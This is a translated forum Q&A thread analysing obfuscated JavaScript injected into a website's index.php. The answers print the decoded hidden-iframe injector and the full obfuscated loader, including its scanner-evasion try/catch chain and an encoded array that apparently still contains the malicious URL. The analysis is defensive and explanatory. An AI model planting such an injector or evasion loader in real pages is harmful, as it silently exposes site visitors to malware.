2012-11-09 10 views

Die Website eines Freundes wurde als bösartig eingestuft, und wir fanden verschleierten Code, der ohne sein Wissen in seine index.php injiziert worden war. Ich habe den Code zwei Ebenen weit deobfuskiert und Folgendes gefunden: Kann mir jemand sagen, warum das bösartig ist?

(code can be viewed in the edit history)

Kann mir jemand sagen, was der Code zu tun versucht und warum er bösartig ist?


Ersetzen Sie "eval" durch "alert", um zu sehen, was der Code tut. – georg

Antwort


Zusammengefasst: Der Code "decodiert" HTML, das ein <iframe> in die Seite einfügt, welches eine bösartige URL lädt.

Die folgende Zeile enthält das "codierte" HTML:

n = ["9","9","45","42", ... 

Jede Zahl stellt ein Zeichen dar, kodiert in Basis 25. Der Code durchläuft dieses Array und wandelt jeden Eintrag mit JavaScript String.fromCharCode() in ein ASCII-Zeichen um. Anschließend wird das Ergebnis mit eval() ausgeführt und so auf der Seite platziert.

Das "decodierte" JavaScript ist:

// Decoded payload (as reported in this answer): the base-25 digit array in the
// loader further down was turned into this text and then handed to eval().
// Both branches do the same thing - place a 10x10, absolutely positioned,
// visibility:hidden <iframe> at the top-left corner so the user never sees it;
// only the insertion method differs, depending on whether <body> exists yet.
// The iframe target was redacted by the answer author ("[stripped]"); nothing on
// this page says what it served beyond the browser malware warning mentioned in
// the other answer.
// Defender's note: when cleaning up a compromised page, look for iframes that
// combine visibility:hidden, position:absolute, left:0;top:0 and tiny
// width/height - that combination is the fingerprint of this injector in both
// branches.
if (document.getElementsByTagName('body')[0]){ 
    // <body> already parsed: build the iframe through the DOM and append it.
    // (iframer is a function declaration, so it is hoisted and callable here.)
    iframer(); 
} else { 
    // No <body> yet (script ran early in the document): write the same iframe
    // markup straight into the HTML stream instead.
    document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
function iframer(){ 
    // Same attributes as the document.write variant, set one by one via the DOM.
    var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 

Hinweis: Ich habe die bösartige URL aus Sicherheitsgründen aus dem Code entfernt.


Danke! Ich war nur neugierig, was er tat und wie. –


Es fügt einen versteckten iframe in die Seite ein, der auf eine möglicherweise dubiose Seite verweist. Hier ist eine sichere Version des Codes, die Sie ausführen können, um zu sehen, was er zu injizieren versucht ...

http://jsfiddle.net/FqtZ8/

Ich habe die Website besucht, auf die er verweist; Chrome warnte mich vor Malware, also bin ich nicht weitergegangen.

// Obfuscated loader as posted, with the final eval() already swapped for alert()
// (see the comment above) so running it only displays the decoded text.
// The nested try/catch chain is built so that every stage throws in a real
// browser and execution is carried forward by the catch blocks; the decoder at
// the bottom only runs once all of them have thrown. Presumably this is meant
// to trip up scanners/emulators that do not reproduce these errors faithfully -
// that intent is inferred, not stated on the page.
try{ 
// Assigning a string to document.body throws in a conforming browser (the
// setter only accepts a body/frameset element), so control lands in the catch.
if(window.document) window["document"]["body"]="123" 
}catch(bawetawe){ 
if(window.document){ 
v=window; 
try{ 
// fawbe is never declared anywhere, so this is a ReferenceError -> next catch.
fawbe-- 
}catch(afnwenew){ 
try{ 
// v is window; window+window coerces to a string, and calling a string throws
// a TypeError -> next catch.
(v+v)() 
}catch(gngrthn){ 
// Legacy octal 020 and hex 0x10 are both 16, so the condition is true and the
// same document.body assignment as above throws once more -> final catch.
// If any of these stages did NOT throw, m would stay undefined and the decode
// loop below (gated on m) would never run.
try{if(020===0x10)v["document"]["body"]="123" 
}catch(gfdnfdgber){ 
m=123; 
// Grab eval only if alert stringifies to native code, i.e. the page has not
// wrapped/overridden the native functions. ev is unused in this alert()
// version; the original presumably called ev(z) at the end.
if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"]; 
} 
} 
// Encoded payload: one array element per output character, each a base-25
// digit string. The page wrapped this single literal onto two lines in the
// middle of the element "1e"; it is still one array. The answer above reports
// that it decodes to the hidden-iframe injector shown there.
n=   ["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g"," j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1
e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"]; 
// h and k are assigned but never read - filler.
h=2; 
s=""; 
// i-589!=0 is just i!==589: exactly 589 elements are consumed. (If n were
// shorter, parseInt(undefined,25) would give NaN and fromCharCode(NaN) a NUL.)
if(m) for(i=0;i-589!=0;i++){ 
k=i; 
// String.fromCharCode with the method name split into pieces; decode each
// element from base 25 to a char code and append it.
if(window["document"]) s+=String["fro"+"mC"+"harCode"](
parseInt(n[i],25) 
); 
// In this version the decoded text is only shown; the original would execute it.
}z=s;alert(z); 
} 
} 
// The trailing "?" appears to be a page artifact, not part of the script.
}? 